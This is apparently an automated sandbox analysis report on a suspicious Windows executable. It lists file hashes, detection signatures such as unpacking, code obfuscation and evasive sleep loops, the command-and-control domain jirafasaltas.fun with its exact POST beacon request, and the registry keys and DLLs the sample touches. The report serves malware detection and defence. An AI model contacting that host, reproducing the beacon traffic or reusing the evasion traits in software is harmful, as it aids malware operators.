Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1500933
MD5: b7a66864aedc3fa7a4686498eaf2b251
SHA1: 045154b73c8c25e29c5db10d297d44e5371af940
SHA256: d51fbbda89b717b798dc784dbe3eb4aa151e9ef095c054e19368698fe923317e
Tags: exe

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

AV Detection

Source: file.exe Virustotal: Detection: 8%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.8% probability

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.3820000.2.unpack
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: Binary string: ntdll.pdb source: file.exe, 00000000.00000002.2348716551.000000000462A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: file.exe, 00000000.00000002.2348716551.000000000462A000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected:
  POST /shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  Content-Length: 96
  Host: jirafasaltas.fun
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: jirafasaltas.fun
Source: unknown HTTP traffic detected:
  POST /shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHaE0GBuUMO5s2rsXKU HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  Content-Length: 96
  Host: jirafasaltas.fun
Source: file.exe, 00000000.00000003.2329160540.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342581353.0000000000D12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jirafasaltas.fun/:
Source: file.exe, 00000000.00000002.2343551941.0000000002AD7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328751588.0000000000D24000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342581353.0000000000D24000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2343551941.0000000002AE3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jirafasaltas.fun/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHa
Source: file.exe, 00000000.00000002.2342409553.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jirafasaltas.fun:443/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpa
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F1135 0_2_033F1135
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F517A 0_2_033F517A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F776A 0_2_033F776A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F5766 0_2_033F5766
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F4FDF 0_2_033F4FDF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F1E12 0_2_033F1E12
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F1CB0 0_2_033F1CB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0340448A 0_2_0340448A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F20EA 0_2_033F20EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0348C6AA 0_2_0348C6AA
Source: file.exe Static PE information: Number of sections : 11 > 10
Source: file.exe, 00000000.00000000.2149262379.00000000009E3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename1StepDVDCopy.exeB vs file.exe
Source: file.exe, 00000000.00000002.2348716551.00000000047A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe, 00000000.00000002.2343092662.00000000028A5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe Binary or memory string: OriginalFilename1StepDVDCopy.exeB vs file.exe
Source: classification engine Classification label: mal60.evad.winEXE@1/0@1/1
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: NATS-SEFI-ADD
Source: file.exe String found in binary or memory: NATS-DANO-ADD
Source: file.exe String found in binary or memory: JIS_C6229-1984-b-add
Source: file.exe String found in binary or memory: jp-ocr-b-add
Source: file.exe String found in binary or memory: JIS_C6229-1984-hand-add
Source: file.exe String found in binary or memory: jp-ocr-hand-add
Source: file.exe String found in binary or memory: ISO_6937-2-add
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 8751104 > 1048576
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4c4000
Source: file.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2a0400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.3820000.2.unpack
Source: file.exe Static PE information: section name: .didata
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F4DC8 push esp; retf 0_2_033F4DC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_033F6640 push eax; ret 0_2_033F6649
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe TID: 64 Thread sleep time: -40880s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2548 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: file.exe, 00000000.00000003.2328751588.0000000000D42000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342581353.0000000000D44000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2342409553.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid